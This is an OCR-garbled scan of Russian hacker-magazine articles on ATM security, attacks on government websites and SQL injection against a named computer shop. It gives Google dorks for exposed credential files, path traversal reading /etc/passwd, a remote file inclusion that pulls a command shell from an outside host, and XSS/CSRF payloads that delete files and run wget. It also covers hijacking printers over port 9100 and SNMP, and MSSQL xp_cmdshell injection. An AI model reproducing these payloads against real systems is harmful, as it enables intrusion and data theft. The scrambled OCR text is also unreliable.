
«БАНКОМАТ С ПРЕСТУПНИКАМИ ОБНАРУЖИЛИ 
ЧЕРЕЗ 1 6 ЧАСОВ ПОСЛЕ КРАЖИ. ЗА ЭТИ 1 6 ЧА- 



СОВ УДАЛОСЬ ПРОРЕЗАТЬ БОЛГАРКОЙ ЛИШЬ 
4 СМ ТОЛЩИНЫ СТЕНКИ СЕЙФА, АУШЛО НА 
ЭТО ЦЕЛЫХ 15 ДИСКОВ!» 



Первым важным моментом в построении линии защиты яв- 
ляются системы видеонаблюдения. Они делятся на внешние 
и внутренние. Внешние устанавливаются независимо от 
банкомата и фиксируют в основном обстановку в непосредс- 
твенной близости отобъекта. Внутренние встраиваются в 
сам банкомат и зачастую незаметны для постороннего. Нас 
интересуют прежде всего внутренние системы видеонаблю- 
дения. Одна и^аспросты^^щых сис тдіч т ако го плана 
— ѴѴеЬАТМ. В Я^Я*ви^^ИВ^тоитйз камерЬш' интерфей- 
сного кабеля. Внешняя аппаретн4я ч а с^гь-йре дета вЛ я ет со- 
бой встраиваемый внутрь^анкомата отдельный миниатюр-, 
ный системный блок компьютерам Таким образом, ѴѴеЬА^ 
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ка «####********####», то на фотографии будет напечатан 
номер карточки «1234********5678». 
сагсі_еѵепІ — включить (при значении > 0) съемку при 
событии «Клиент вставил карточку»/«Клиентзабрал кар- 
точку». О — выключить реакцию на событие. 

Значение задает количество кадров для съемки, 
то есть «еѵепі5.сагсІ_еѵепі =10» — камера сделает 
1 0 кадров после данного события. Поумодч анию — 0. 
гедиез*_5^сІ — событие транзакДЯ 
на съем денег или на получение остатка 
#ецие5І;_5епб_ра1;Ь, гецие5І:_Бепб_бе[ау — 






Ч У 

> На дискеты найдешь 
описание конфигу- 
рационного файла 
ѴѴеЬАТМ. 




>Внимание! Инфор- 
мация предоставлена 
исключительно с 
целью ознакомления! 
Ни автор, ни редакция 
затвои действия 
ответственности не 
несут! 




>Банкоматы, помимо 
видеосъемки, ведут 
еще и полное дотиро- 
вание всехопераций. 
Крометого, многие из 
них оборудованы 6Р5- 
маячками. 

Во многих российских 
банках сотрудники СБ 
не отличаются особой 
вежливі 
в сл\*Йе с 
дей^Й^ій будь‘г 
пол\ Дкг ь физи^Н 
отпі 
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атоип* — сумматранзакции, еслитаковая была. 
Какты видишь, камера не просто делает 
снимки, но и помещает на снимок информацию 
о транзакции: дату, сумму, номер карточки ит.д. 
При каких-либо махинациях с банковскими кар- 
точками такой снимок послужит отличным до- 
казательством в суде. Так что польза (а кому-то и 
угроза) таких систем налицо :]. Однако ѴѴеЬАТМ 

— игрушка дорогая, и далеко не все банки могут 
позволить себе ее установку. 

Следующий важный нюанс на линии обороны 
предполагаемого противника ака банкомата 

— ОРЗ-маячки. Коротко напомню суть самой 
системы ѲР5-навигации. біобаі Розібопіпд 
Бузует (0Р5) — это спутниковая навигационная 
система, состоящая из более 20 спутников, 
работающих в единой сети и находящихся на 
шести орбитах на высоте около 1 7000 км над 
поверхностью Земли. Спутники постоянно дви- 
жутся со скоростью около 3 км/сек, совершая 

2 полных оборота вокруг планеты менее чем 
за 24 часа. Кстати, сама спутниковая система 
6Р5 известна также под другим названием 

— ЫАѴ5ТАР. В последнее время широкое 
распространение получили 6Р5-маячки. 
Причем используются они для самых разнооб- 
разных целей: начиная охранными системами 
и заканчивая реализацией совсем не благих 
намерений. В нашем случае подобный маячок 
встраивается в банкомате целью передачи 
координат своего местоположения службе 
безопасности банка. 

Для того чтобы учесть все интересные моменты, 
разберемся в принципе работы ѲР5-маячка 
более детально. Сигнал 6Р5-спутника содер- 
жит псевдослучайный код (РВЫ — рзеисіо- 
гапбот собе), эфимерис (ерЫтегіз) и альманах 
(аІтапасЫ. Псевдослучайный код служит для 
идентификации передающего спутника. Все они 
пронумерованы: от 1 до32. С целью облегчения 
обслуживания ѲР5-сети количество РРКІ-но- 
меровбольше, чем число спутников. Данные 
эфимериса, постоянно передаваемые каждым 
спутником, содержаттакую важную информацию, 
каксостояние спутника (рабочее или нерабочее), 
текущая дата и время. Это позволяет 6Р5-при- 
емнику сверять время/дату. Крометого, эта часть 
сигнала играетсвою роль в определении место- 
положения. Данные альманаха сообщают о том, 
где втечение дня должны находиться спутники. 
Каждый из них передает альманах, содержа- 
щий параметры своей орбиты, а также орбиты 
други х^ с^ у т н гж овс исте м ы . ѲР5-приемник 
^Ввает эГосооб&^ запоминает эфимерис 
и альмана^лл^Аьірйшего использования. Эта 
же информация используется для установки или 
коррекции времени/даты. Адля определения 
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> Общая схема устройства банкомата 



местоположения 6 Р5-приемн и к сравнивает 
время отправки сигнала со спутника со временем 
его получения на Земле. Эта разница во времени 
говоритприемнику о расстоянии до конкретного 
спутника. Если добавить к этому информацию о 
расстоянии до нескольких других спутников, то 
можно определить свое местоположение. Кстати, 



на полноценное функционирование маячка, 
зависит от планировки, толщины стен и про- 
чих факторов. В принципе маячок можно по- 
пытаться самостоятельно извлечь из корпуса 
банкомата, но тут есть небольшая загвоздка. 
Дело в том, что старые модели банкоматов не 
предусматривали их оснащение 6Р5-обору- 



«В ВЕЛИКОБРИТАНИИ БЫЛ ЛЮБО- 
ПЫТНЫЙ СЛУЧАЙ. МЕСТНЫЙ УМЕЛ ЕЦ 
ПРОСЛУШИВАЛ ЛИНИИ, ПО КОТОРЫМ 
ПЕРЕДАВАЛАСЬ ИНФОРМАЦИЯ В ПРО- 
ЦЕССИНГОВЫЙ ЦЕНТР, С ПОМОЩЬЮ 
ОБЫКНОВЕННОГО МРЗ’ШНИКА» 



постоянное отслеживание местоположения в 
течение некоторого времени может быть ис- 
пользовано для расчета скорости и направления 
движения объекта, оснащенного 6Р5-маячком. 
Как видишь, технология достаточно сложная, 
но чрезвычайно полезная. Хотя в ней есть 
и свои недостатки. В первую очередь, это 
ограничения на места эксплуатации. Там, 
где нет спутниковых сигналов (или они по 
каким-либо причинам не доходят), устанав- 
ливать 6 Р5- маячок бессмысленно. Предпо- 
ложим, что после кражи банкомат помещен 
в глубокий подземный погреб. При таких 
об^го^ельствах ОРЗ-навиг^ция бессильна 
=). Неприятная ситуация пририсовывается 
и со^^ниями. Качество сигнала, кд>то|%ій 
> самым негюсредственным обраДЦшыает^ 




дованием. Поэтому поиск и «обезврежива- 
ние» крепления может обернуться солидным 
геморроем. 

Еще одна существенная помеха на пути атаку- 
ющих«в лоб» — корпус банкомата, в частности 
сейф. Во-первых, банкомат весит более четырех 
тонн, а во-вто рых, толстые стенки корпуса 
сделаны из сверхпрочного металла. Сотрудник 
одного из банков рассказал мне достаточно 
поучительную историю о краже банкомата. Бан- 
коматобнаружили вместе со злоумышленни- 
ками через 1 6 часов после кражи. Так вотза эти 
самы&16 часовудалось прорез ать болгарко й 
ли^э4смтолщины стенки сейра^ушло ь^это 
15 дисков! Никто не утверждает, что в Е крыть 
банкомат нереально, но на это нужно потратить 
ку ч у с и лТчаы^м ен и . 
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О Атака изнутри 

Так, сугрозами извне разобрались и плавно переходим кугрозам 
изнутри =). Сразу оговорюсь, что рассматривать инсайдерский способ 
добычи информации мы сейчас не будем, так как речь идет именно 
о банкомате, а не о человеческом факторе. Суть идеи заключается в 
перехвате трафика между банкоматом и банком во время соверше- 
ния транзакции. Это позволит получить доступ к банковским данным 
кардхолдеров со всеми вытекающими отсюда последствиями :]. В 
некотором виде, это напоминает атаку класса гпап-а-тісісііе (человек 
посередине). С этой технологией, полагаю, ты знаком. Но в нашем 
случае есть несколько особенностей: 

• повсеместное видеонаблюдение; 

• сигнализация; 

• шифрованный трафик. 

Также стоит учитывать, что сеть может оказаться беспроводной. Первый 
пункт мешаетустановить подключение непосредственно вблизи банко- 
мата/банка. А отрыть кабель на глубине нескольких метров будет весьма 
проблематично, учитывая, что в подвальные помещения банка тебя 
просто так никто не пустит. Крометого, сигнализация не сыграет на руку 
злоумышленникам, хотя при умелом подходе этотфактор можно почти 
полностью отбросить. Но зато появляется новый — проверка линии 
(проводная сеть) службой безопасности банка. Этом, как вычислить 
постороннее подключение на линии, я рассказывал еще в мартовском 
номережурнала. 

Допустим, что по халатности в течение некоторого времени твое 
подключение останется незамеченным. Но тут возникает следую- 
щая проблема — шифрование трафика. Все данные от банкоматов 
передаются в зашифрованном виде, сейчас для этого повсеместно 
применяется 1024-битное шифрование. Какты понимаешь, не имея 
ключей шифрования, можно запросто остаться не удел. Самой 
распространенной системой шифрования подобного рода является 
0Е5АТМ. Все данные шифруются прямо на банкомате и весь путь 
следования проходятзашифрованными. Расшифровываются они на 
сервере, который находится в защищенной сети в непосредственной 
близости от контроллера банкомата. Однако если подобные системы 
не используются, то в открытом виде чаще всего не передается лишь 
РІ N -код, а вся сопутствующая инфа (номер карточки, данные кардхол- 
дера ит.д.) остаются незашифрованными. Кстати, в Великобритании 
был любопытный случай, когда местный умелец прослушивал линии, 
по которым передавалась информация в процессинговый центр, с 
помощью обыкновенного трЗ’шника :). Ошибка банка заключалась в 
том, что его СБ не использовала на своих банкоматах дополнительное 
криптографическое ПО. Так что шанс все же есть, хоть и небольшой. 
Вот, правда, умельца этого нашли и отправили в места не столь отда- 
ленные. 

ОЗанавес 

Ну что же, наиболее интересные моменты защиты банкоматов были 
разобраны. Конечно, рассмотреть все детали в рамках этой статьи 
было невозможно. Во-первых, такой материал занял бы по объему 
пару выпусков «X», а во-вторых, почти вся документация такого 
плана имеет гриф ДСП (для служебного пользования) и распро- 
страняется с трого между сотр удн и к а|^ б анк ов. Все же я надеюсь, 



г 



что мысли о вЯШТё батомеДгепер^ станут посещать тебя реже =). 
Если коротко, то хлопотное этО-Дело і^одчэсное. стоит вставать на 
кривую дорожку, живи и ^от^чай от’жИз-пи максимумудо^ол^твия, а 
банкоматы оставь в покор - 
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ГОСУДАРСТВЕННАЯ 

БЕЗОПАСНОСТЬ 



ПРАВИЛЬНЫЙ ХАКИНГ ООѴ-РЕСУРСОВ 



Для обеспечения безопасности объектов государства применяются наиболее нестан- 
дартные и современные методы защиты. Это касается и интернета, так как достаточно 
большое количество ресурсов так или иначе относится к ведомственной структуре. 
Однако некоторым хакерам все-таки удается через них получать доступ к сетевой инф- 
раструктуре, обходя применяемую защиту, что позволяет украсть важные данные, если 
они там имеются. Хочешь узнать как? Тогда читай дальше! 



О Кто стоит за всем этим 

Безусловно, возлагать такое ответственное 
дело, как безопасность, на плечи прыща- 
вого админа непозволительно, ведь в таких 
сферах крутятся важные документы и све- 
дения. Здесь требуются специалисты, и для 
подготовки требуемых кадров были созданы 
специальные учебные заведения. У нас в 
стране этим занимается Академия ФСБ, в 
которой активно развивается направление 
информационной безопасности и специ- 
альной связи, за бортом — всевозможные 



заведения, относящиеся к Агенству наци- 
ональной безопасности ( N 8А) и обороны 
(БОБ). Ы5А из названных организаций 
более открыто к обычным массам, так как, 
кроме своей традиционной деятельности, 
разрабатывает всевозможные ІТ-докумен- 
тации и адвайзори, посвященные настройке 
*піх-систем, безопасности систем ѴѴіпсіоѵѵб- 
платформы, и многое другое. Все это, ко- 
нечно, здорово, но и здесь порой находится 
достаточно огрехов, еще раз доказывающих 
компетентность зарубежных деятелей :). 



□ Квам ревизор! 

Для начала организации независимой проверки 
подобного рода ресурсов было решено воспользо- 
ваться методом боодіе Наскіпд, а затем провести 
активный аудит нескольких из них. Таким образом 
можно максимально сократить время и очень быс- 
тро находитьтрадиционные дефекты в скриптовом 
ПО. Весь процесс ограничивался следующими 
запросами для нахождения требуемых ресурсов. 
Поискресурсов: 

зіСе: .доѵ ТіІеСуре : ріір 
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іпигі : " = * . Ьбті " 

Поиске раскрытием информации о базе данных: 

зібе: .доѵ іпбібіе : Іпсіех об .тузд1_Мзбогу 
зібе: .доѵ бі1ебуре:зд1 

Сделанные выводы таковы: файлы .ЬазЬ_Ы5іогу и .туздІ_ 
Ьізіогу важны как для хакера, так и для админа. Взломщик 
можетудаленно выловить конфиденциальные команды 
через бажный скрипт (нередко права на файл позволяют 
ему это сделать) и найти среди них пароли (это могут быть 
аргументы вызова Ыраззѵѵб, возможен ввод пароля после 
ошибочных команд зи и ззИ). Второй файл будет полезен, 
если хакер желаетузнать пароль на определенную учетную 
запись. Файл необходимо проанализировать на наличие 
функции раззѵѵогсН) и строки «іпбепШесІ Ьу». Админ может 
засечь неприметного взломщика по наличию посторонних 
команд в .ЬазЬ(тузр[)_Ы5іогу. 

Поиске раскрытием пользовательской информации: 

зібе: .доѵ іпбібіе : Іпйех . об ебс зЪаскж 

Поиске возможностью чтения конфиденциальных сведений: 

іпигі: доѵ бі1ебуре:х1з «гезбгісбесі» 

Не стоит мнить себя крутым хакером, считая полученные 
результаты своим большим достижением, так как найден- 
ное представляет собой, скорее, последствия невни- 
мательности админа, дефектов его логики: отсутствия 



этике называются вещи, связанные ствоим собственным 
исследованием и любопытством. Заметь, последнее зани- 
мает особое место в Манифесте Хакера. 

□ Наша миссия 

Перед нами стоит немного нетрадиционная задача. Кроме 
обычного захвата сайтов, мы должны добыть все возможные 
сведения, например, о сотрудниках, о сфере деятельности и 
о возможной топологии сетевой инфраструктуры. 

Пути развития решения: 

1. сетевой шпионажза сотрудниками и применение СИ; 

2. получение удаленного доступа к просторам сети ресурса 
(ѵѵеЬ-сервер находится в одном сетевом окружении). 

О Ресурс: доѵ.Ьс.са 

□ Информация: провинция Британской Колумбии 

Первое осуществимо множеством путей. К примеру, файлы 
логинов (/ебс/раззѵѵсі) порой содержат данные с ФИО поль- 
зователей, на сервере некорректно расставлены СНМОй, 
что позволяетсчитыватьархивы электронной переписки. С 
помощью Гугла находим баг на дочернем ресурсе. 

ѵ\ПлплпЬср1 . доѵ.Ьс . са/дс/збюіл/збабіс .р]тр?раде 

ебс/раззтл/сі 

Послеусловной идентификации пользователей системы 
становится актуальным узнать их персональные данные, 
например электронную почту. Дело втом, что из всей этой 
информации можно выстроить логические цепи и опреде- 



«ЗАДАЧАСВ0ДИТСЯК0ПРЕДЕЛЕНИЮ СЕ- 
ТЕВОГО АДРЕСАДОВЕРЕННОГО ЛИЦАМ ЕГО 
ПОДМЕНЕ ПУТЕМ ИСПОЛЬЗОВАНИЯ МЕТОДА 
ИЗМЕНЕНИЯ Х-РОВѴѴАВОЕВ-РОВ В ЗАГОЛОВКЕ 
НТТР-ЗАПРОСА» 



практических знаний о правах доступа (сЬглосіб), о методах 
локального хранения БД после бека па, о выполнении 
авторизированного доступа кзначимым документам, рас- 
положенным на хосте. Реальной уязвимостью в хакерской 



лить деятельность сотрудника. В своем случае я восполь- 
зовался анализом зон, запрещенных для индексирования 
поисковыми ботами и сгаѵѵіег'ами. Для этого достаточно 
изучить файл гоЬобз.бхб: 



^ взлом 




>3а государствен- 
ной безопасностью 
следят вполне 
компетентные люди, 
поэтомуятебе очень 
не советую рисковать 
и воспроизводить 
описанные мной 
действия. Это может 
плохо кончиться. За 
применение мате- 
риала в незаконных 
целях автор и редак- 
ция ответственности 
не несут. 




> Статистика брешей 
в зоне .доѵ: 

• наличие общедо- 
ступных неавторизи- 
рова иных директо- 
рий (5%); 

• размещение ресур- 
сов на збагесі- 
хостингах (15%); 

• публичный бэкап 
переписки (30%); 

• общедоступные 
админ-панели (10%); 

• некорректное 
управление БД (6%); 

• использование 
заведомо уязвимого 
ПО (40%). 



г \ 




\ У 

>Весьописанный 
в статье софт ты 
найдешь на диске к 
журналу. 
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> Раскрытие информации о 5(ЭІ_-сервере на сайте Генпрокурату- 
ры России 




>Хек в процессе 



Бзег-АдепБ : * 

Бізаіісж: /ѴКБ/*.Ъ.Бт1 
Бізаіісж: /ѴКБ/*/* .ЬБтІ 
Бізаіісж: /ѴКБ/ * / * / * . Ъ.Бт1 
Бізаіісж: /ѴКБ/Ъазіс_зБютл/. рАр 
Бізаіісж: /таіі/ 

Бізаіісж: /ѴКБ/(Іеѵ\/еу/диегу . ІгБтІ 
Бізаііоот: /УКБ/зикдесБ/диегу . 
ЬБтІ 



Бізаііоот: /еІІ/зеагсЬ.рІір 
Бізаіісж: /ВСЗБаБз/ 
Бзег-АдепБ : тзпЪоБ 
Бізаіісж: / 



После обращения к директории /В СЗіаІз/ 
стало ясно, что доступ туда могут получать 
только заведомо идентифицированные юзеры 
(привязка к ІР-адресу), что вполне адекватно 
для систем такого рода, но крайне неактуаль- 
но при раскрытии персональной информации. 
Задача сводится к определению сетевого 
адреса доверенного лица и его подмене 
путем использования метода изменения 
Х-Рогѵѵагсіег-Рог в заголовке НТТР-запроса, 
что поможет нам успешно авторизироваться 
и получить доступ к информации. Добиться 
последнего можно с помощью прозрачного 
прокси, либо конструктора НТТР-запросов, 
вроде Оббузее. Охота за ІР завершилась про- 
смотром лимитированной директории /таіі/, 
где бэкапилась вся переписка с полноценны- 
ми данными из МІМЕ-фильтров, показыва- 
ющими ІР отправителя. Итог нашего взлома 
— получение конфиденциальных данных 
каталога /ВСЗіаіз. 



□ Ресурс: еб.доѵ 

□ Информация: Министерство образования 
США 



Воспользовавшись Гугловым поиском по кон- 
фиденциальным хті-файлам, натыкаемся на 
следующий баг: 

ѵтѵг. ей. доѵ/Біпаіс!?Бі1е_ 
раБЪ=с!аБа/БаЫе47Ъ.х1з/ 
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еБс/раззж! 

Беда подобной конструкции в том, что, когда 
файловые системы встречаютспецификатор 
пути к родительскому каталогу, они не проверя- 
ют наличие всех каталогов. Именно из-за этого 
удается обойти проверку и считать раззѵѵб. Итог 
взлома — локальное чтение файлов. Больше на 
этом домене ничего отрыть не удалось :(. 

□ Ресурс: зрогБдоѵ.то 

□ Информация: Министерство спорта Макао 

Сейчас мы рассмотрим способ, анонимизиру- 
ющий нашу деятельность. РРІ-атаки (Ретоіе 
Рііе I псіизіоп) можно совмещать с поиском уже 
готового залитого шелла (запрос«іпигІ:стб.діІ 
(рЬрДхі)») — самое простое, что приходит в голо- 
ву. Таким образом, использовав простой инклуд, 
мы вторглись на сервер. 

ѵтѵі. зрогБ . доѵ.шо/2 001/еп/ 
зміттіпд/гезиІБ . р]тр?раде=]тББр : // 
іБсіеБепсе. ги/зкѵог/стсі.ріір 

В скриптзаложен простейший интерпретатор. 
При выполнении команд, отделенных«?» от 
указателя формата, представляется свобода 
действий, ограниченная правами побобу ;]. 

□ Техники Х5ВР и С5ВР 

Следующая идея состоит в создании комбина- 
ции для изменения стартовой страницы ресурса 
Монако, причем при полной инициации дейс- 
твия. Специально вызвав ошибку в обработке 
кавычки, я узнал полные пути директорий 
(/ехрогі/Ьоте/\л/еЬабтіп/риЬІіс_ЬітІ/ 
з р о гі/ 2 0 0 1 /е п/ зѵѵі т т і п д ) . 

Следует помнить, что никто не мешает отпра- 
вить злобный запрос в связке сХ55 своему 
другу-америкосу, чтобы он сделал пакость само- 
стоятельно. Для большей беспаливности есть 
несколько методов, один из которых состоит в 
поиске Х55, маскировке обращения к нему на 
каком-либо ресурсе, либо его имитации, ну и, 
собственно, его выполнении. Подобныетехники 



носят название СгоззБііе Реіегепсе Рогдегу 
(Х5РР, С5РР). 

Варианты использования: 

1. Вставка вместе с ІРРАМЕ на любой сайт, при 
открытии которого исполнится команда: 

<іБгате згс=]тББр : / /доѵ/ 
Іпс1ис1е=стс1. рЬр?сс1 /ехрогБ/Ъ.оте/ 
ѵ\/еЪа<±піп/риЪ1іс_]гБт1/зрогБ/ & гт 
іпсіех.ріір & ѵ/деБ кББр : / /х/ іпсіех . 
рАрх/іБгаше> 

2. Простой сценарий: 

<зсгірБ> 

ѵаг Боо = пеѵ\/ Ішаде ( ) ; 

Боо.згс = "кББр : //БюзБ/ 

Рсошшагхб" ; 

</зсгірБ> 

3. Сценарий посложнее: 

<зсгірБ> 

ѵаг розБ_сіаБа = , пате=ѵа1ие' ; 
ѵаг хт1]гББр=пеѵ\/ ХМБНББрКедиезБ ( ) ; 
хтІЬББр . ореп ( " РОЗТ" , ЧтББр:// 
иг1/раБЬ./Бі1е . ехБ ' , Бгие) ; 
хшІЬББр . опгеасіузБаБесЬапде = 
БипсБіоп () { 

ІБ (хтІІтББр . геабуЗБаБе == 4) 

{ 

аІегБ (хтІЬББр . гезропзеТехБ) ; 

} 

} ; 

хтІкББр . зепб (розБ_сіаБа) ; 

</зсгірБ> 

Между прочим, такие хакерские трюки активно 
юза ют скриптовые ви русо писатели. 5а ту 
— Х55-червь, заразивший кучу юзеров сервиса 
Музрасе, использовал именно этот прием. 
Кроме этого, для пущей беспалевности сущест- 
вуют методы хайдинга кода в обычных вещах, к 
примеру в казЬ'ках, РОР-документах и многом 
другом. Подобные методы впервые осветила 
креативная команда ѲІЧІІСІТІРЕМ [ дписібгеп. 



ХАКЕР 04 /100/ 07 




взлом 




огд/Ыод/ЬасксІоогіпд-БазЬ-о^есІз-гесеірі ). 
продемонстрировав пригодность компилятора 
МТА5С Асбоп Эсгірі [ тіазс.огд ) и набора тулз 
для редактирования ЭѴѴТооІз [ зуѵКооІз.огд ]. 

□ Через принтер в преисподнюю 

Чтобы отойти оттемы всяческих инъекций, 
поговорим об альтернативном, но абсолютно 
антонимичном методе работы по проникно- 
вению во внутренности сетей — о компроме- 
тации сетевого оборудования. Здесь весомы 
атаки класса йгіѵе Ьуіегтіпд и всевозможные 
уязвимости ПО. Я рассмотрю подобные штуки 
на аппаратных принт-серверах. Благодаря 
таким решениям управлять печатью можно 
из любого места (втом числе и из интернета). 
Во-первых, сетевой девайс может объеди- 
нять несколько принтеров и спокойно рулить 
печатью на них; во-вторых, при недостатке 
средств на несколько мест для печати, доста- 
точно обзавестисьтаким, чтобы сотрудники 
в случае надобности обращались к нему. При 
таком варианте печати используется общий 
принтер в сети МісгозоІЧ, что позволяет 
юзерам раздавать свои ресурсы для общего 
пользования. Это не убавляет проблем с 
безопасностью :). Как ни странно, такие вещи 
очень часто попадают в то самое рабочее 
сетевое окружение, которое можно легко 
опознать извне. Порой это можно сделать 
простым исследованием: 

• чтением ргіпіегз.сопб /еіс/сирз/сирзсі.сопб 
Ьаскир на взломанном сайте; 

• сканом НТТР ѲЕТ-запросами; 

• обнаружением устройств, управляемых по 
5ЫМР; 

• поиском через Гугл принт-сервисов (напри- 
мер, ІЗРгіпіег). 

Основные возможности после захвата принтера 
оченьзаманчивы: 

• изучение локальных процессов; 

• возможность перехвата печатаемого (особен- 



ноактуально, если через эти самые машинки 
гоняется конфиденциальная информация, либо 
документы); 

• просмотр факсимильной корреспонденции, 
которая была распечатана, и телефонных 
адресатов; 

• нарушение стабильной работы сети; 

• смена надписи на БСй-дисплее принтера :); 

• локальное поднятие привилегий на исполь- 
зуемой принтером машине посредством захвата 
встроенного ѵѵеЬ-сервера; 

• редактирование АСБ-политик. 

Попробуем обнаружить сервисы следующими 
нехитрыми запросами. 

іпигі : 1ір/с1еѵісе/СЪ.із . 

ЬСБізраСсЬег 

іпигі : " : 63 1/ргіпСегз " -ріір -сіешо 
іпРіСІе: "ъ/еЪ ітаде шопіРог" 

" /тл/еЪ/изег/еп/тл/еЪзуз/меЪАгсЪ./ 

таіпРгаше . сді " 

іпигі : " /еп/зСз_іпс!ех . сді " 

□ Ресурс: Агту ІпБэгтаБоп Зузіетз Сепіег 

□ Информация: подсеть военного ведомства 

Этот ресурс мне удалось выудить простым Гугл- 
запросом на наличиеѵѵеЬ-сервиса. В ответя 
получил ссылку вида «6.1 .1 0.56/Ьр/]е1:сІігес1:». 

На первый взгляд, ничего привлекательного 
в линке нет, но, поинтересовавшись инфор- 
мацией по адресации диапазонов адресов, 
можно понять, что айпишник принадлежит 
охраняемой подсети (6.* — Агту ІпЬгтаБоп 
Эузіетз Сепіег). 

Определив порт, на котором висит чудо, можно 
творить следующие вещи: 

• изменятьтекст БСБ-дисплея: 

СеІпеС 192.169.1.2 9100 

@РББ КБУМЗС БІЗРБАУ= " Зоте ТехС " 

л ] диіС 



» 




> Демонстрация файлового обмена между 
принтерным хостом и хакером с помощью 
НІеКег 




> Дешевый скриптовый ханипотна сайте 
МАЗА 



• взламывать парольное подключение 
по 5ЫМР с помощью зтірдеі; [ пеі-зптр. 
зоигсеІ'огде.пеІі/босз/тап/зптрдеБЫппІ ) , где в 
НЕХ'е зашифрован пароль на подключение: 

зптрдеС -ѵ 1 -с риЫіс 
192.168.2.46 .1.3.6.1.4.1.11.2.3 
.9.1.1.13.0 

ЗБМРѵ2-ЗМІ : : епСегргізез .11.2.3 
.9.1.1.13.0 = Нех-ЗТКІШ? 50 41 
53 53 57 4Р 52 44 ЗБ 31 30 38 ЗВ 00 
00 00 

• просматривать все локальные процессы 
ипіхііке-командой рз. 

Дляупрощения подобныхзадач можно воспользо- 
ваться утилитой РЕТІ рбепоеІІБсІе/Ьр/сІоѵѵпІоаб.ЫтІ ). 
либо РЕТ— РЗЕЕІеігапзІегІ рНепоеІіЕсІе ). которые 
крайне актуальны для работы с протоколом принтера. 

□ Чем бы дитя нетешилось... 

На этом мне придется закончить свою «эпопею» 
взломов государства. Думаю, ты уяснил, что 
геморроя с подобными доменами оченьмного. 
Приходится надеяться лишь на помощь поис- 
ковика, сканеров и набора софта, который еще 
никогда не подводил :).Ш 



ХАКЕР 04 /100/ 07 



/ 085 






взлом 



І.ЕХХ91 8 



ПОЗИТРОН 
В МИНУСЕ 



ТРЕПАНАЦИЯ ИНТЕРНЕТ-ШОПА 



Ты заметил, что на рынке все чаще и чаще стали встречаться крупные и не очень кон- 
торы по сборке компов? Филиалы по всей стране, бренды, за которыми скрываются 
совершенно незнакомые разрозненные магазины, фирменные логотипы на системных 
блоках и свои сборки драйверов. И все бы хорошо, но качество самого железа в таких 
заведениях всегда оставляет желать лучшего. Мало того — я тебе сейчас на живом при- 
мере покажу, как они дружат с шеЪ-программированием. 



□ Поискуязвимости 

Адело былотак! Есть в нашей стобой замеча- 
тельной стране не менее замечательная контора 
«Позитроника». Мой город не избежал участи 
многих остальных, и по соседству открылся их 
филиал. Это, конечно, дело вкуса, но лично я 
подобные заведения стараюсь не посещать 
вовсе. Но почему бы из любопытства не зайти 
на их сайт — розіігопіса.ги ? Как и любая другая 
цивилизованная организация, эта контора 
тоже имела свой внутрикорпоративный портал, 
доступ ккоторомубыл строго ограничен. Лишь 



посвященные могли просматривать сводные 
графики итаблицы, меняться мнением с колле- 
гами, синхронизировать базусвоего магазина с 
общей базой главного офиса, обсуждать за кры- 
тыетемы и заниматься прочими интересными 
и вкусными делами. Тут мне и пришла мысль: а 
почемубы ни приобщиться кэтомуделу? 

Добрые люди подсказали сабдомен, на котором 
ютился приватный портал — ЬирУ/сір.ровіІгопіса.ги . 
и я принялся за его изучение. На главной стра- 
нице не было ничего, кроме формы авторизации. 
Два банальных поля «логин» и «пасс»уныло 



встретили меня на пустой странице и совсем не 
порадовали. Зато внимание привлекла ссылочка 
на форму восстановления пароля. В ней нужно 
было только указать свое мыло, и на него в туже 
секунду высылался забытый пароль. Какэто ни 
странно, но моего адреса в базе не нашлось! Я 
не отчаялся и отправил на проверку обычную 
одинарную кавычку. М-да... не стоило полагаться 
на порядочность модераторов и админов, тем 
более что я не относился ни ктем, ни кдругим. 
Сайт пошуршал и вывалил мне предупреждение 
о синтаксической ошибке в М55С1І_. 
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> Мелкое хулиганство с личными данными :) 




МЗЗЦІ_ - сам севе шелл 

Дядя Билли не перестает меня удивлять. Оказывается, 
его СУБД позволяет нетолько делать множествен- 
ные запросы в одной строке (через символ «;»], но и 
пользоваться многими прелестями ОС. Если некоторые 
настройки оставлены поумолчанию, то строка 
«'; ехес та5Іег..хр_стсЫіеІГріпд 10.10.1 .2'—» запросто 
может пинговать всех и вся. Азапрос«'; ехес тавіег. 
5р_такеѵѵеЫа5к "10.10.1 .ЗвЬагеоиІриБЫтІ", "5ЕБЕСТ " 
ЕРОМ ІЫЕ0РМАТІ0М_5СНЕМА.ТАВЕЕ5"» и вовсезапи- 
шет весь вывод в файл. Об этом и о многом другом можно 
узнать на сайте ѵѵѵѵѵѵ.ігоіа пес. ги . 

Тутясделаю небольшое отступление. К моменту, когда я нашел 
эту банальную инъекцию, БД от дяди Билла мне была незнакома. 
Пришлось чуть-чуть погуглить. Детали я опущу и расскажу о 
самом интересном из того, что мнеудалось найти. Эта чудо-база 
данных позволяеттворить с собой такие забавные вещи, что я 



10 ' 

ШІСЖ 

ЗЕЬЕСТ ТОР 1 

СОПѵегЪ ( іпЕ , ТАВЬЕ_ЕАМЕ ) 

ЕРОМ ШЕОКМАТІОЫ_ЗСНЕМА.ТАВЬЕЗ 
ШНЕКЕ ТАВЬЕ_ЫАМЕ НОТ ЫКЕ ' зупсоЪ;І_% ' 

АЛБ ТАВЬЕ_ЫАМЕ БОТ Ш ( ' о1(3_ЦаЫе_пате ' ) 

Итак, первая строка нужна только для того, чтобы вкли- 
ниться в существующий запрос и корректно закрыть 
выражение в кавычках. Цифру я поставил чисто от 
фонаря, но могу поспорить, что, дописав некое число 
в конец адреса электронной почты, мы уже явно не полу- 
чим ничего существующего в природе, а потому письмо 
с новым паролем никогда не найдет своего адресата. 
Вторая строка добавляет запрос посредством объеди- 
нения. В третьей строке мы просим вернуть нам только 



«ЛИШЬ ПОСВЯЩЕННЫЕ МОГЛИ ПРОСМАТРИ- 
ВАТЬ СВОДНЫЕ ГРАФИКИ, МЕНЯТЬСЯ МНЕНИЕМ 
С КОЛЛЕГАМИ, ОБСУЖДАТЬ ЗАКРЫТЫЕ ТЕМЫ И 
ЗАНИМАТЬСЯ ПРОЧИМИ ИНТЕРЕСНЫМИ ДЕЛА- 
МИ. ТУТ МНЕ И ПРИШЛА МЫСЛЬ, А ПОЧЕМУ БЫ 
НИ ПРИОБЩИТЬСЯ К ЭТОМУ ДЕЛУ?» 



в 

> На нашем дискеты 
найдешь видеовзлом, 
который полностью 
повторяет эту статью. 
Смотри иучись :). 




> Не стоитзабывать, 
что взлом — дело 
противозаконное! Ни 
автор и ни редакция за 
твои действия ответс- 
твенности не несут! 



